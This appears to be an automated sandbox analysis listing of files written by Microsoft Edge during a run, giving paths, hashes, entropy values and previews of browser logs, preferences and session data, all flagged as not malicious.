SHA-256:	8BE3C96EE64B5D2768057EA1C4D1A70F40A0041585F3173806E2278E9300960B
SHA-512:	2862BF83C061414EFA2AC035FFC25BA9C4ED523B430FDEEED4974F55D4450A62766C2E799D0ACDB8269210078547048ACAABFD78EDE6AB91133E30F6B5EBFFBD
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.180560735984671
Encrypted:	false
SSDEEP:	6:HE98QGt+q2P923oH+Tcwt8NIFUt8YE98hV7ZZmw+YE98hV7NVkwO923oH+Tcwt8n:k98QXv4YebpFUt8/98hV1/+/98hVn5LO
MD5:	5E47299151E863012A0DE8E75A08BB05
SHA1:	988ED2540B6562F3CF4E7E9521B0C4DDE8EBE894
SHA-256:	4BD85A0188C9A22E063EFBB838C07B1C81A005E0E89485D66FFEECBF94A8C31C
SHA-512:	F66F120F630224E6C26246C4D393C74C1892991C5AA804CF6D3AA3842393C964EBB4A589E68BD771C9B8F0EC1A510693126822BACFA1EC5F6080A4DD853AB13C
Malicious:	false
Preview:	2024/11/21-16:13:03.589 1568 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/21-16:13:03.590 1568 Recovering log #3.2024/11/21-16:13:03.590 1568 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.180560735984671
Encrypted:	false
SSDEEP:	6:HE98QGt+q2P923oH+Tcwt8NIFUt8YE98hV7ZZmw+YE98hV7NVkwO923oH+Tcwt8n:k98QXv4YebpFUt8/98hV1/+/98hVn5LO
MD5:	5E47299151E863012A0DE8E75A08BB05
SHA1:	988ED2540B6562F3CF4E7E9521B0C4DDE8EBE894
SHA-256:	4BD85A0188C9A22E063EFBB838C07B1C81A005E0E89485D66FFEECBF94A8C31C
SHA-512:	F66F120F630224E6C26246C4D393C74C1892991C5AA804CF6D3AA3842393C964EBB4A589E68BD771C9B8F0EC1A510693126822BACFA1EC5F6080A4DD853AB13C
Malicious:	false
Preview:	2024/11/21-16:13:03.589 1568 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/21-16:13:03.590 1568 Recovering log #3.2024/11/21-16:13:03.590 1568 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.290184711153421
Encrypted:	false
SSDEEP:	12:k98qv4Yeb8rcHEZrELFUt8/984/+/98g5LYeb8rcHEZrEZSJ:k9z4Yeb8nZrExg8/9K9tLYeb8nZrEZe
MD5:	79564EF477F023128424FDFF3C8A20FC
SHA1:	449EBF91D060DEF2D91B0B4608A031F4F3DBC3FD
SHA-256:	F229045951C747A4A2B384CEFAF10ECBEB3F788493456A77464ACC38A205228F
SHA-512:	F9CBB31922EAD89B4DAB5239ABDB43DC3E5E56583FCA3BA2334010DA6509FDC9C5F71681566D1D9558E83806C9C10DD710E0F88B78F85E5AD9AFE912DD663C38
Malicious:	false
Preview:	2024/11/21-16:13:04.780 1568 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/21-16:13:04.781 1568 Recovering log #3.2024/11/21-16:13:04.781 1568 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.290184711153421
Encrypted:	false
SSDEEP:	12:k98qv4Yeb8rcHEZrELFUt8/984/+/98g5LYeb8rcHEZrEZSJ:k9z4Yeb8nZrExg8/9K9tLYeb8nZrEZe
MD5:	79564EF477F023128424FDFF3C8A20FC
SHA1:	449EBF91D060DEF2D91B0B4608A031F4F3DBC3FD
SHA-256:	F229045951C747A4A2B384CEFAF10ECBEB3F788493456A77464ACC38A205228F
SHA-512:	F9CBB31922EAD89B4DAB5239ABDB43DC3E5E56583FCA3BA2334010DA6509FDC9C5F71681566D1D9558E83806C9C10DD710E0F88B78F85E5AD9AFE912DD663C38
Malicious:	false
Preview:	2024/11/21-16:13:04.780 1568 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/21-16:13:04.781 1568 Recovering log #3.2024/11/21-16:13:04.781 1568 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.173579641408034
Encrypted:	false
SSDEEP:	6:HE98ICq2P923oH+Tcwt8a2jMGIFUt8YE98uEsZmw+YE98jF1PkwO923oH+Tcwt8N:k98Vv4Yeb8EFUt8/98uL/+/98LP5LYek
MD5:	758647B6E0E0167ADBB7D6ED07A29B44
SHA1:	44442E5F457C8146D3BF86E72F5346BCA5E1E937
SHA-256:	AAA3B2B6ADCF82DA8034A74A0AFE6408E4A49F7703FC675F4B1BF7418D8E9C85
SHA-512:	F51889F05AAE562CD4177CC5744627CF8F8D0780A1A5249C53B16E3373C5631BAAED4F51BE106A0700DDEE4761F6492891BA1302D0DEFC398A7892AB910F40B4
Malicious:	false
Preview:	2024/11/21-16:13:01.515 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/21-16:13:01.517 1894 Recovering log #3.2024/11/21-16:13:01.527 1894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.173579641408034
Encrypted:	false
SSDEEP:	6:HE98ICq2P923oH+Tcwt8a2jMGIFUt8YE98uEsZmw+YE98jF1PkwO923oH+Tcwt8N:k98Vv4Yeb8EFUt8/98uL/+/98LP5LYek
MD5:	758647B6E0E0167ADBB7D6ED07A29B44
SHA1:	44442E5F457C8146D3BF86E72F5346BCA5E1E937
SHA-256:	AAA3B2B6ADCF82DA8034A74A0AFE6408E4A49F7703FC675F4B1BF7418D8E9C85
SHA-512:	F51889F05AAE562CD4177CC5744627CF8F8D0780A1A5249C53B16E3373C5631BAAED4F51BE106A0700DDEE4761F6492891BA1302D0DEFC398A7892AB910F40B4
Malicious:	false
Preview:	2024/11/21-16:13:01.515 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/21-16:13:01.517 1894 Recovering log #3.2024/11/21-16:13:01.527 1894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4ce68d6b-dca2-47f8-bd90-c3f4cdb3d0f7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF50537.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fc1e3a5f-30dd-43e8-8545-18e2b663682c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ff59a42a-fa02-4f34-85b1-1d5f4a36b70b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9615
Entropy (8bit):	5.117051869036601
Encrypted:	false
SSDEEP:	192:stjykdlAhs1gpsZihUkSs0o8bKbV+F0PQA66WJaFIMYJP3YJ:stjy/hs1gpfh6FKbGMQx6WJaTYO
MD5:	DE5BE088A4C9E59227C455C1EF363EAE
SHA1:	2407ADB1D1DD4B5DF13FC9342AE9420D5B074197
SHA-256:	8D279B7549DCE90272316E340B19ABE809392869901ED832AC959E679492FF0D
SHA-512:	FB54DCB2DBE2B1E427587D0A9CFB7CE5D390BE9B406C0018295B60E04FF1872AFBF53C19F1AD81AD0A34EF614E6B57AF559D50D3BD198DE41189C646644C4E90
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376697183230723","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":10090,"left":10000,"maximized":false,"right":10500,"top":10000,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":0,"browser_content_container_width":456,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_lin

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.567399906177493
Encrypted:	false
SSDEEP:	768:DTvgsuWPKcfVQ8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFUAVirw9pTtuG:DTvgsuWPKcfVQu1jac7VHvt1
MD5:	753D1929F220D7293269A53A6C825F10
SHA1:	E6592029A78018F6C6E392E47D2820A291F9AD02
SHA-256:	EF9C14C088AA439E2C960C0FFFDEA5723F201D051D7CB2069FC2BCCFA359B8DE
SHA-512:	EE63862EC91D38EFDE23594A2D34D07C3F3E187F0E9C312BBB02FF8A00C94A65BDA2E9B309BA332F5C6AA4329D21040C5B95E604913D5EE497C66DFEBF6A83F5
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376697181232775","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376697181232775","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	242
Entropy (8bit):	4.404644024658047
Encrypted:	false
SSDEEP:	6:S85aEFljljljljl9FllaV93K+Be9W43cvadUV:S+a8ljljljljl9FlcK+eL3cvaW
MD5:	ECC174D46500D0B4829D06B1392A1057
SHA1:	AEF4A7CAEA1A289B7486581D9146E4EAE1FC0337
SHA-256:	450206CF934971C58B37E44C47BCD6A84C27F570ADA89E0E7BBEC7AB19D0E925
SHA-512:	2776ADD681E4884C1731E2FE377EB4AF196B71A0A2DC5ED765E20FC49AFC4E48BCE1763E478C74ACB7B6118A13CEF7018F23AC7BD43B59B7ACA36293FF9D9DD3
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................Lb................next-map-id.1.Cnamespace-66a51c3d_3213_4870_81b0_bdd9db75a25a-https://ntp.msn.com/.0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.125548438264403
Encrypted:	false
SSDEEP:	6:HE98mxq2P923oH+TcwtrQMxIFUt8YE98DeZmw+YE981SkwO923oH+TcwtrQMFLJ:k98Qv4YebCFUt8/98De/+/981S5LYebf
MD5:	00C5B3F0C278C44E73CE2E93487CDF80
SHA1:	049588AB27BCF8946C301B18159BE5D8CC200876
SHA-256:	3A5FE20FDDB478B988FAD964265CDD56B3CFEB8A5C97859DBF275E0DA5C084FB
SHA-512:	D06F8F2B055E105B61EDFD1C62B4C49C23DFB58ECD0611DA471AD9A6084E28DF892763867C05E566B1E9AA153AFFE257D5E9456ED5B7B3CAA77FD8964554C705
Malicious:	false
Preview:	2024/11/21-16:13:03.600 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/21-16:13:03.601 1894 Recovering log #3.2024/11/21-16:13:03.607 1894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.125548438264403
Encrypted:	false
SSDEEP:	6:HE98mxq2P923oH+TcwtrQMxIFUt8YE98DeZmw+YE981SkwO923oH+TcwtrQMFLJ:k98Qv4YebCFUt8/98De/+/981S5LYebf
MD5:	00C5B3F0C278C44E73CE2E93487CDF80
SHA1:	049588AB27BCF8946C301B18159BE5D8CC200876
SHA-256:	3A5FE20FDDB478B988FAD964265CDD56B3CFEB8A5C97859DBF275E0DA5C084FB
SHA-512:	D06F8F2B055E105B61EDFD1C62B4C49C23DFB58ECD0611DA471AD9A6084E28DF892763867C05E566B1E9AA153AFFE257D5E9456ED5B7B3CAA77FD8964554C705
Malicious:	false
Preview:	2024/11/21-16:13:03.600 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/21-16:13:03.601 1894 Recovering log #3.2024/11/21-16:13:03.607 1894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13376697183740020

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	3.797744038247885
Encrypted:	false
SSDEEP:	24:3g2xnQ3cvGIRAjSyesrpsAF4unxA9tLp3X2amEtG1ChqgRF4boQKkOAM4A6:3DQ3cvj6zFGLp2FEkChtKlHOp
MD5:	E265042408DF6DE69830D31FD129AE7A
SHA1:	AAD970D252DA9C497517A3EE2664E7D1AE0E1272
SHA-256:	F45FA601F8E4470C9B289BD7AC4A34BDF86ABFD3FB4F6C27BDEBC81E1BF148CB
SHA-512:	B5F7A7C98129086D80197D7F8F19C65DCD605C695A4694A4104A29B640F6201EBA92F9641AACE446AAF93942751DD8E26E760AFE12A50AF9AB9827A8181F5490
Malicious:	false
Preview:	SNSS..........A..............A......"...A..............A..........A..........A..........A....!.....A..................................A...A1..,......A$...66a51c3d_3213_4870_81b0_bdd9db75a25a......A..........A....bF............A...5..0......A&...{98952893-68FF-4A5D-A164-705C709ED3DB}........A..........A.'...'......Z.............A..............A........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x..........r'.....r'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... ..........................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	349
Entropy (8bit):	5.089687726927167
Encrypted:	false
SSDEEP:	6:HE98nwVq2P923oH+Tcwt7Uh2ghZIFUt8YE98aSgZmw+YE98aSIkwO923oH+Tcwts:k98nwVv4YebIhHh2FUt8/98aSg/+/98B
MD5:	68032F94F135EBBE8D31992A4B54476B
SHA1:	4A9BF0E6B3E8C6676B86E5A57ECDCD6D0C326D60
SHA-256:	5F933F5344ACC0ADC4345F4F8BC7DB36DA36F0B8DBEE1F1C39EB934C0432716B
SHA-512:	962F9257E1A98E0E6C87272A70D15AB8B5FE5416B9CE31B2D1ADFF9B952DB5AAE49D7F8E8851A6511373D951FE6D5EF94AEFC8D49C9C114D62FABC96048B3D9D
Malicious:	false
Preview:	2024/11/21-16:13:01.217 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/21-16:13:01.218 440 Recovering log #3.2024/11/21-16:13:01.218 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	349
Entropy (8bit):	5.089687726927167
Encrypted:	false
SSDEEP:	6:HE98nwVq2P923oH+Tcwt7Uh2ghZIFUt8YE98aSgZmw+YE98aSIkwO923oH+Tcwts:k98nwVv4YebIhHh2FUt8/98aSg/+/98B
MD5:	68032F94F135EBBE8D31992A4B54476B
SHA1:	4A9BF0E6B3E8C6676B86E5A57ECDCD6D0C326D60
SHA-256:	5F933F5344ACC0ADC4345F4F8BC7DB36DA36F0B8DBEE1F1C39EB934C0432716B
SHA-512:	962F9257E1A98E0E6C87272A70D15AB8B5FE5416B9CE31B2D1ADFF9B952DB5AAE49D7F8E8851A6511373D951FE6D5EF94AEFC8D49C9C114D62FABC96048B3D9D
Malicious:	false
Preview:	2024/11/21-16:13:01.217 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/21-16:13:01.218 440 Recovering log #3.2024/11/21-16:13:01.218 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	431
Entropy (8bit):	5.209730881103726
Encrypted:	false
SSDEEP:	12:k982+v4YebvqBQFUt8/98g1/+/98R3V5LYebvqBvJ:k9m4YebvZg8/969aXLYebvk
MD5:	4E16380A8AC6B7B7B54CF94DCE5A1AF0
SHA1:	709DAB5134AB2FD7F16CA7E98E8ADF480D7114BF
SHA-256:	D58162E468707ECDABA37EC3A593C2B5598D6FAC4D938384DA4387C3CC6DB738
SHA-512:	949759DD17B6050658F8F4D317516C7C47DE1D1715CBB3B7D45DD59A73AE014933917B7F0D5D135EE0C3334FBCB0161646504B2264CF330820E4153D8858B9AA
Malicious:	false
Preview:	2024/11/21-16:13:03.604 19c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/21-16:13:03.608 19c Recovering log #3.2024/11/21-16:13:03.614 19c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	431
Entropy (8bit):	5.209730881103726
Encrypted:	false
SSDEEP:	12:k982+v4YebvqBQFUt8/98g1/+/98R3V5LYebvqBvJ:k9m4YebvZg8/969aXLYebvk
MD5:	4E16380A8AC6B7B7B54CF94DCE5A1AF0
SHA1:	709DAB5134AB2FD7F16CA7E98E8ADF480D7114BF
SHA-256:	D58162E468707ECDABA37EC3A593C2B5598D6FAC4D938384DA4387C3CC6DB738
SHA-512:	949759DD17B6050658F8F4D317516C7C47DE1D1715CBB3B7D45DD59A73AE014933917B7F0D5D135EE0C3334FBCB0161646504B2264CF330820E4153D8858B9AA
Malicious:	false
Preview:	2024/11/21-16:13:03.604 19c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/21-16:13:03.608 19c Recovering log #3.2024/11/21-16:13:03.614 19c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

